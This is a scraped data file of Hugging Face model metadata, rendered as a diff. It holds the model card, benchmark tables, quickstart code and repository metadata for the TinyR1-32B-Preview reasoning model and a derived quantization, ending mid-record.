|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
qihoo360/TinyR1-32B-Preview,"---
|
| 3 |
+
license: apache-2.0
|
| 4 |
+
library_name: transformers
|
| 5 |
+
base_model:
|
| 6 |
+
- deepseek-ai/DeepSeek-R1-Distill-Qwen-32B
|
| 7 |
+
---
|
| 8 |
+
|
| 9 |
+
**Model Name**: Tiny-R1-32B-Preview
|
| 10 |
+
|
| 11 |
+
|
| 12 |
+
## Update(April 16, 2025)
|
| 13 |
+
|
| 14 |
+
We have officially open-sourced the <a href=""https://huggingface.co/datasets/qihoo360/TinyR1-32B-Preview-datasets""><b>training dataset</b></a>, as well as the full <a href=""https://github.com/Qihoo360/TinyR1-32B-Preview""><b>training and evaluation pipeline</b></a> .
|
| 15 |
+
|
| 16 |
+
## Update(March 7, 2025)
|
| 17 |
+
|
| 18 |
+
We have uploaded the technical report. <a href=""https://arxiv.org/abs/2503.04872""><b>Paper Link</b>👁️</a>
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
## Introduction
|
| 22 |
+
We introduce our first-generation reasoning model, Tiny-R1-32B-Preview, which outperforms the 70B model Deepseek-R1-Distill-Llama-70B and nearly matches the full R1 model in math.
|
| 23 |
+
|
| 24 |
+
We applied supervised fine-tuning (SFT) to Deepseek-R1-Distill-Qwen-32B across three target domains—Mathematics, Code, and Science — using the [360-LLaMA-Factory](https://github.com/Qihoo360/360-LLaMA-Factory/) training framework to produce three domain-specific models. We used questions from open-source data as seeds. Meanwhile, responses for mathematics, coding, and science tasks were generated by R1, creating specialized models for each domain. Building on this, we leveraged the Mergekit tool from the Arcee team to combine multiple models, creating Tiny-R1-32B-Preview, which demonstrates strong overall performance.
|
| 25 |
+
|
| 26 |
+
*Note:* We have fixed a new tokenizer config bug that existed before March 3, 2025, at 20:50 Beijing Time (UTC+8). Refer to [Hotfix](https://huggingface.co/qihoo360/TinyR1-32B-Preview#hotfix-march-3-2025).
|
| 27 |
+
|
| 28 |
+
|
| 29 |
+
## Evaluation
|
| 30 |
+
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
|
| 31 |
+
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
|
| 32 |
+
| Deepseek-R1-Distill-Qwen-32B | 72.6 | 57.2 | 62.1 |
|
| 33 |
+
| Deepseek-R1-Distill-Llama-70B | 70.0 | 57.5 | 65.2 |
|
| 34 |
+
| Deepseek-R1 | 79.8 | 65.9 | 71.5 |
|
| 35 |
+
| Tiny-R1-32B-Preview (Ours) | 78.1 | 61.6 | 65.0
|
| 36 |
+
|
| 37 |
+
All scores are reported as pass@1.
|
| 38 |
+
For AIME 2024, we sample 16 responses, and for GPQA-Diamond, we sample 4 responses, both using average overall accuracy for stable evaluation.
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
We merged the models trained separately in three directions into a single model. Below are the comparison results.
|
| 42 |
+
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
|
| 43 |
+
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
|
| 44 |
+
| Math-Model | 73.1 | - | - |
|
| 45 |
+
| Code-Model | - | 63.4 | - |
|
| 46 |
+
| Science-Model | - | - | 64.5 |
|
| 47 |
+
| Merged-Model (Tiny-R1-32B-Preview) | 78.1 | 61.6 | 65.0
|
| 48 |
+
|
| 49 |
+
|
| 50 |
+
## Quickstart
|
| 51 |
+
|
| 52 |
+
```python
|
| 53 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 54 |
+
|
| 55 |
+
model_name = ""qihoo360/TinyR1-32B-Preview""
|
| 56 |
+
|
| 57 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 58 |
+
model_name,
|
| 59 |
+
torch_dtype=""auto"",
|
| 60 |
+
device_map=""auto""
|
| 61 |
+
)
|
| 62 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name)
|
| 63 |
+
|
| 64 |
+
prompt = ""Please reason step by step, and put your final answer within \\boxed{}. Solve the integral: \[I = \int \frac{x^2}{(x+1)^3} \,dx\]""
|
| 65 |
+
messages = [
|
| 66 |
+
{""role"": ""user"", ""content"": prompt}
|
| 67 |
+
]
|
| 68 |
+
text = tokenizer.apply_chat_template(
|
| 69 |
+
messages,
|
| 70 |
+
tokenize=False,
|
| 71 |
+
add_generation_prompt=True
|
| 72 |
+
)
|
| 73 |
+
model_inputs = tokenizer([text], return_tensors=""pt"").to(model.device)
|
| 74 |
+
|
| 75 |
+
generated_ids = model.generate(
|
| 76 |
+
**model_inputs,
|
| 77 |
+
max_new_tokens=4000
|
| 78 |
+
)
|
| 79 |
+
generated_ids = [
|
| 80 |
+
output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)
|
| 81 |
+
]
|
| 82 |
+
|
| 83 |
+
response = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]
|
| 84 |
+
|
| 85 |
+
print(response)
|
| 86 |
+
```
|
| 87 |
+
|
| 88 |
+
|
| 89 |
+
## Data
|
| 90 |
+
|
| 91 |
+
#### 1. Math
|
| 92 |
+
58.3k CoT trajectories from [open-r1/OpenR1-Math-220k](https://huggingface.co/datasets/open-r1/OpenR1-Math-220k), default subset
|
| 93 |
+
|
| 94 |
+
#### 2. Coding
|
| 95 |
+
19k CoT trajectories [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), coding subset
|
| 96 |
+
|
| 97 |
+
#### 3. Science
|
| 98 |
+
8.6k CoT trajectories:
|
| 99 |
+
- 2.7k CoT trajectories from [simplescaling/data_ablation_full59K](https://huggingface.co/datasets/simplescaling/data_ablation_full59K), science and health science subset
|
| 100 |
+
- 4.9k CoT trajectories from [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), science subset
|
| 101 |
+
- 1.0k CoT trajectories from [simplescaling/s1K-1.1](https://huggingface.co/datasets/simplescaling/s1K-1.1), all
|
| 102 |
+
|
| 103 |
+
|
| 104 |
+
## Open Source Plan
|
| 105 |
+
We will publish a technical report as soon as possible and open-source our training and evaluation code, selected training data, and evaluation logs. Having benefited immensely from the open-source community, we are committed to giving back in every way we can.
|
| 106 |
+
|
| 107 |
+
## Caveats
|
| 108 |
+
TinyR1-32B-Preview is an experimental research model designed to advance AI reasoning capabilities. As a preview release, it has demonstrated higher evaluation scores on some benchmarks but is not intended for general user applications. Key limitations include:
|
| 109 |
+
|
| 110 |
+
1. Incorrect parameter configurations may result in repetitive output loops, similar to R1. We recommend setting the temperature to 0.6 and top-p to 0.95, in line with R1's configuration.
|
| 111 |
+
2. The model currently omits the `<think>` token, which indicates the reasoning start, and only outputs the `</think>` token to signal the end of the thinking process. This will be addressed soon in the next version.
|
| 112 |
+
3. The model may generate overly lengthy reasoning chains for simple queries. We are working on improvements.
|
| 113 |
+
4. Benchmark coverage is limited. We encourage users to evaluate the model on additional benchmarks, and we will continue to expand our benchmark results.
|
| 114 |
+
5. The model requires enhanced safety measures to ensure reliable and secure performance.
|
| 115 |
+
|
| 116 |
+
## Hotfix (March 3, 2025)
|
| 117 |
+
On March 3, 2025, at 20:50 Beijing Time (UTC+8), we update our tokenizer. Users who downloaded our model prior to this update are advised to re-download the tokenizer-related configuration files (tokenizer.json, tokenizer_config.json, config.json and special_tokens_map.json).
|
| 118 |
+
Our internal testing has verified that this update resolves the following issues reported by users:
|
| 119 |
+
1. Output repetition.
|
| 120 |
+
2. Degradation in benchmark performance.
|
| 121 |
+
3. Generation of token IDs exceeding the vocabulary range.
|
| 122 |
+
We appreciate your feedback and encourage you to report any further issues. Additionally, we are actively working on the technical report and consolidating relevant code and data.
|
| 123 |
+
|
| 124 |
+
|
| 125 |
+
## Contributors
|
| 126 |
+
|
| 127 |
+
*360 Team:*
|
| 128 |
+
Lin Sun,
|
| 129 |
+
Guangxiang Zhao,
|
| 130 |
+
Xiaoqi Jian,
|
| 131 |
+
Weihong Lin,
|
| 132 |
+
Yongfu Zhu,
|
| 133 |
+
Change Jia,
|
| 134 |
+
Linglin Zhang,
|
| 135 |
+
Jinzhu Wu,
|
| 136 |
+
Sai-er Hu,
|
| 137 |
+
Xiangzheng Zhang
|
| 138 |
+
|
| 139 |
+
*PKU Team:*
|
| 140 |
+
Yuhan Wu,
|
| 141 |
+
Zihan Jiang,
|
| 142 |
+
Wenrui Liu,
|
| 143 |
+
Junting Zhou,
|
| 144 |
+
Bin Cui,
|
| 145 |
+
Tong Yang
|
| 146 |
+
|
| 147 |
+
|
| 148 |
+
## Citation
|
| 149 |
+
```
|
| 150 |
+
@misc{tinyr1proj,
|
| 151 |
+
title={SuperDistillation Achieves Near-R1 Performance with Just 5% of Parameters.},
|
| 152 |
+
author={TinyR1 Team},
|
| 153 |
+
year={2025},
|
| 154 |
+
eprint={},
|
| 155 |
+
archivePrefix={},
|
| 156 |
+
primaryClass={},
|
| 157 |
+
url={https://huggingface.co/qihoo360/TinyR1-32B-Preview},
|
| 158 |
+
}
|
| 159 |
+
```","{""id"": ""qihoo360/TinyR1-32B-Preview"", ""author"": ""qihoo360"", ""sha"": ""b1124b4dd0cdd1f4816e975164b2c0599c9a09a4"", ""last_modified"": ""2025-04-16 14:27:33+00:00"", ""created_at"": ""2025-02-24 15:54:05+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 4024, ""downloads_all_time"": null, ""likes"": 327, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""qwen2"", ""text-generation"", ""conversational"", ""arxiv:2503.04872"", ""base_model:deepseek-ai/DeepSeek-R1-Distill-Qwen-32B"", ""base_model:finetune:deepseek-ai/DeepSeek-R1-Distill-Qwen-32B"", ""license:apache-2.0"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- deepseek-ai/DeepSeek-R1-Distill-Qwen-32B\nlibrary_name: transformers\nlicense: apache-2.0"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""Qwen2ForCausalLM""], ""model_type"": ""qwen2"", ""tokenizer_config"": {""bos_token"": ""<\uff5cbegin\u2581of\u2581sentence\uff5c>"", ""chat_template"": ""{% if not add_generation_prompt is defined %}{% set add_generation_prompt = false %}{% endif %}{% set ns = namespace(is_first=false, is_tool=false, is_output_first=true, system_prompt='') %}{%- for message in messages %}{%- if message['role'] == 'system' %}{% set ns.system_prompt = message['content'] %}{%- endif %}{%- endfor %}{{bos_token}}{{ns.system_prompt}}{%- for message in messages %}{%- if message['role'] == 'user' %}{%- set ns.is_tool = false -%}{{'<\uff5cUser\uff5c>' + message['content']}}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is none %}{%- set ns.is_tool = false -%}{%- for tool in message['tool_calls']%}{%- if not ns.is_first %}{{'<\uff5cAssistant\uff5c><\uff5ctool\u2581calls\u2581begin\uff5c><\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{%- set ns.is_first = true -%}{%- else %}{{'\\n' + '<\uff5ctool\u2581call\u2581begin\uff5c>' + tool['type'] + '<\uff5ctool\u2581sep\uff5c>' + tool['function']['name'] + '\\n' + '```json' + '\\n' + tool['function']['arguments'] + '\\n' + '```' + '<\uff5ctool\u2581call\u2581end\uff5c>'}}{{'<\uff5ctool\u2581calls\u2581end\uff5c><\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endfor %}{%- endif %}{%- if message['role'] == 'assistant' and message['content'] is not none %}{%- if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>' + message['content'] + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- set ns.is_tool = false -%}{%- else %}{% set content = message['content'] %}{% if '</think>' in content %}{% set content = content.split('</think>')[-1] %}{% endif %}{{'<\uff5cAssistant\uff5c>' + content + '<\uff5cend\u2581of\u2581sentence\uff5c>'}}{%- endif %}{%- endif %}{%- if message['role'] == 'tool' %}{%- set ns.is_tool = true -%}{%- if ns.is_output_first %}{{'<\uff5ctool\u2581outputs\u2581begin\uff5c><\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- set ns.is_output_first = false %}{%- else %}{{'\\n<\uff5ctool\u2581output\u2581begin\uff5c>' + message['content'] + '<\uff5ctool\u2581output\u2581end\uff5c>'}}{%- endif %}{%- endif %}{%- endfor -%}{% if ns.is_tool %}{{'<\uff5ctool\u2581outputs\u2581end\uff5c>'}}{% endif %}{% if add_generation_prompt and not ns.is_tool %}{{'<\uff5cAssistant\uff5c><think>\\n'}}{% endif %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<\uff5cend\u2581of\u2581sentence\uff5c>"", ""unk_token"": null, ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='TinyR1_32B_Preview.pdf', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00012-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00013-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00014-of-00014.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 32763876352}, ""total"": 32763876352}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-04-16 14:27:33+00:00"", ""cardData"": ""base_model:\n- deepseek-ai/DeepSeek-R1-Distill-Qwen-32B\nlibrary_name: transformers\nlicense: apache-2.0"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""67bc961d66ca0c292d5f321c"", ""modelId"": ""qihoo360/TinyR1-32B-Preview"", ""usedStorage"": 65540024750}",0,"https://huggingface.co/AlexBefest/tinyR1-32B-preview_exl2_6.0bpw, https://huggingface.co/Apel-sin/tinyR1-32B-preview-exl2",2,https://huggingface.co/GainEnergy/OGAI-r1,1,"https://huggingface.co/YiHuan/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/DevQuasar/qihoo360.TinyR1-32B-Preview-GGUF, https://huggingface.co/mradermacher/TinyR1-32B-Preview-GGUF, https://huggingface.co/mradermacher/TinyR1-32B-Preview-i1-GGUF, https://huggingface.co/Orion-zhen/TinyR1-32B-Preview-AWQ, https://huggingface.co/llpp9980/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/Chan-Y/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/JohnRoger/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/openity/TinyR1-32B-Preview-Q5_K_M-GGUF, https://huggingface.co/physicsplayer/TinyR1-32B-Preview-Q8_0-GGUF, https://huggingface.co/EntropyYue/TinyR1-32B-Preview-Q2_K-GGUF, https://huggingface.co/tensorblock/TinyR1-32B-Preview-GGUF, https://huggingface.co/cassettesgoboom/TinyR1-32B-Preview-Q3_K_L-GGUF, https://huggingface.co/mlx-community/TinyR1-32B-Preview-8bit, https://huggingface.co/bartowski/qihoo360_TinyR1-32B-Preview-GGUF, https://huggingface.co/mmnga/TinyR1-32B-Preview-gguf, https://huggingface.co/GrimsenClory/TinyR1-32B-Preview-Q6_K-GGUF, https://huggingface.co/bartowski/qihoo360_TinyR1-32B-Preview-v0.1-GGUF, https://huggingface.co/cnfusion/TinyR1-32B-Preview-Q3-mlx, https://huggingface.co/cnfusion/TinyR1-32B-Preview-Q4-mlx, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q3_K_S-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q3_K_M-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q3_K_L-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q4_K_S-GGUF, https://huggingface.co/cnfusion/TinyR1-32B-Preview-Q6-mlx, https://huggingface.co/bartowski/qihoo360_TinyR1-32B-Preview-v0.2-GGUF, https://huggingface.co/MrDevolver/TinyR1-32B-Preview-Q2_K-GGUF, https://huggingface.co/Aldaris/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/onekq-ai/TinyR1-32B-Preview-bnb-4bit, https://huggingface.co/Xccxin/TinyR1-32B-Preview-Q8-mlx, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q4_K_M-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q5_K_S-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q5_K_M-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q6_K-GGUF, https://huggingface.co/Triangle104/TinyR1-32B-Preview-Q8_0-GGUF",35,"https://huggingface.co/DavidAU/Qwen2.5-QwQ-35B-Eureka-Cubed, https://huggingface.co/DavidAU/Qwen2.5-QwQ-37B-Eureka-Triple-Cubed, https://huggingface.co/DavidAU/Qwen2.5-The-Wisemen-QwQ-Deep-Tiny-Sherlock-32B, https://huggingface.co/marcuscedricridia/Springer-32B-1, https://huggingface.co/YOYO-AI/DS-R1-Distill-32B-SCE, https://huggingface.co/YOYO-AI/DS-R1-Distill-32B-SCE-V2",6,huggingface/InferenceSupport/discussions/new?title=qihoo360/TinyR1-32B-Preview&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bqihoo360%2FTinyR1-32B-Preview%5D(%2Fqihoo360%2FTinyR1-32B-Preview)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 160 |
+
https://huggingface.co/AlexBefest/tinyR1-32B-preview_exl2_6.0bpw,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 161 |
+
Apel-sin/tinyR1-32B-preview-exl2,"---
|
| 162 |
+
license: apache-2.0
|
| 163 |
+
library_name: transformers
|
| 164 |
+
base_model: qihoo360/TinyR1-32B-Preview
|
| 165 |
+
---
|
| 166 |
+
|
| 167 |
+
**Model Name**: Tiny-R1-32B-Preview
|
| 168 |
+
**Title**: SuperDistillation Achieves Near-R1 Performance with Just 5% of Parameters.
|
| 169 |
+
|
| 170 |
+
# Introduction
|
| 171 |
+
We introduce our first-generation reasoning model, Tiny-R1-32B-Preview, which outperforms the 70B model Deepseek-R1-Distill-Llama-70B and nearly matches the full R1 model in math.
|
| 172 |
+
|
| 173 |
+
|
| 174 |
+
## Evaluation
|
| 175 |
+
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
|
| 176 |
+
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
|
| 177 |
+
| Deepseek-R1-Distill-Qwen-32B | 72.6 | 57.2 | 62.1 |
|
| 178 |
+
| Deepseek-R1-Distill-Llama-70B | 70.0 | 57.5 | 65.2 |
|
| 179 |
+
| Deepseek-R1 | 79.8 | 65.9 | 71.5 |
|
| 180 |
+
| Tiny-R1-32B-Preview (Ours) | 78.1 | 61.6 | 65.0
|
| 181 |
+
|
| 182 |
+
All scores are reported as pass@1.
|
| 183 |
+
For AIME 2024, we sample 16 responses, and for GPQA-Diamond, we sample 4 responses, both using average overall accuracy for stable evaluation.
|
| 184 |
+
|
| 185 |
+
## Approach
|
| 186 |
+
| Model | Math (AIME 2024) | Coding (LiveCodeBench) | Science (GPQA-Diamond) |
|
| 187 |
+
| ------------------------------- | ------------------- | ----------------------- | ---------------------- |
|
| 188 |
+
| Math-Model (Ours) | 73.1 | - | - |
|
| 189 |
+
| Code-Model (Ours) | - | 63.4 | - |
|
| 190 |
+
| Science-Model (Ours) | - | - | 64.5 |
|
| 191 |
+
| Tiny-R1-32B-Preview (Ours) | 78.1 | 61.6 | 65.0
|
| 192 |
+
|
| 193 |
+
|
| 194 |
+
We applied supervised fine-tuning (SFT) to Deepseek-R1-Distill-Qwen-32B across three target domains—Mathematics, Code, and Science — using the [360-LLaMA-Factory](https://github.com/Qihoo360/360-LLaMA-Factory/) training framework to produce three domain-specific models. We used questions from open-source data as seeds, and used DeepSeek-R1 to generate responses for mathematics, coding, and science tasks separately, creating specialized models for each domain. Building on this, we leveraged the Mergekit tool from the Arcee team to combine multiple models, creating Tiny-R1-32B-Preview, which demonstrates strong overall performance.
|
| 195 |
+
|
| 196 |
+
|
| 197 |
+
|
| 198 |
+
## Data
|
| 199 |
+
|
| 200 |
+
#### 1. Math
|
| 201 |
+
58.3k CoT trajectories from [open-r1/OpenR1-Math-220k](https://huggingface.co/datasets/open-r1/OpenR1-Math-220k), default subset
|
| 202 |
+
|
| 203 |
+
#### 2. Coding
|
| 204 |
+
19k CoT trajectories [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), coding subset
|
| 205 |
+
|
| 206 |
+
#### 3. Science
|
| 207 |
+
We used R1 to generate 8 CoT trajectories on 7.6k seed examples, and got 60.8k CoT trajectories in total; the seed examples are as follows:
|
| 208 |
+
- 2.7k seed examples from [simplescaling/data_ablation_full59K](https://huggingface.co/datasets/simplescaling/data_ablation_full59K), science and health science subset
|
| 209 |
+
- 4.9k seed examples from [open-thoughts/OpenThoughts-114k](https://huggingface.co/datasets/open-thoughts/OpenThoughts-114k), science subset
|
| 210 |
+
|
| 211 |
+
|
| 212 |
+
|
| 213 |
+
## Open Source Plan
|
| 214 |
+
We will publish a technical report as soon as possible and open-source our training and evaluation code, selected training data, and evaluation logs. Having benefited immensely from the open-source community, we are committed to giving back in every way we can.
|
| 215 |
+
|
| 216 |
+
|
| 217 |
+
|
| 218 |
+
## Contributors
|
| 219 |
+
|
| 220 |
+
*360 Team:*
|
| 221 |
+
Lin Sun,
|
| 222 |
+
Guangxiang Zhao,
|
| 223 |
+
Xiaoqi Jian,
|
| 224 |
+
Weihong Lin,
|
| 225 |
+
Yongfu Zhu,
|
| 226 |
+
Change Jia,
|
| 227 |
+
Linglin Zhang,
|
| 228 |
+
Jinzhu Wu,
|
| 229 |
+
Sai-er Hu,
|
| 230 |
+
Xiangzheng Zhang
|
| 231 |
+
|
| 232 |
+
*PKU Team:*
|
| 233 |
+
Yuhan Wu,
|
| 234 |
+
Zihan Jiang,
|
| 235 |
+
Wenrui Liu,
|
| 236 |
+
Junting Zhou,
|
| 237 |
+
Bin Cui,
|
| 238 |
+
Tong Yang
|
| 239 |
+
|
| 240 |
+
|
| 241 |
+
## Citation
|
| 242 |
+
```
|
| 243 |
+
@misc{tinyr1proj,
|
| 244 |
+
title={SuperDistillation Achieves Near-R1 Performance with Just 5% of Parameters.},
|
| 245 |
+
author={TinyR1 Team},
|
| 246 |
+
year={2025},
|
| 247 |
+
eprint={},
|
| 248 |
+
archivePrefix={},
|
| 249 |
+
primaryClass={},
|
| 250 |
+
url={https://huggingface.co/qihoo360/TinyR1-32B-Preview},
|
| 251 |
+
}
|
| 252 |
+
```","{""id"": ""Apel-sin/tinyR1-32B-preview-exl2"", ""author"": ""Apel-sin"", ""sha"": ""16e61f3b9ec1b3f41ddf36aed6b23729ae858c20"", ""last_modified"": ""2025-03-01 12:15:35+00:00"", ""created_at"": ""2025-03-01 12:14:00+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1, ""downloads_all_time"": null, ""likes"": 3, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""base_model:qihoo360/TinyR1-32B-Preview"", ""base_model:finetune:qihoo360/TinyR1-32B-Preview"", ""license:apache-2.0"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: qihoo360/TinyR1-32B-Preview\nlibrary_name: transformers\nlicense: apache-2.0"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='measurement.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-01 12:15:35+00:00"", ""cardData"": ""base_model: 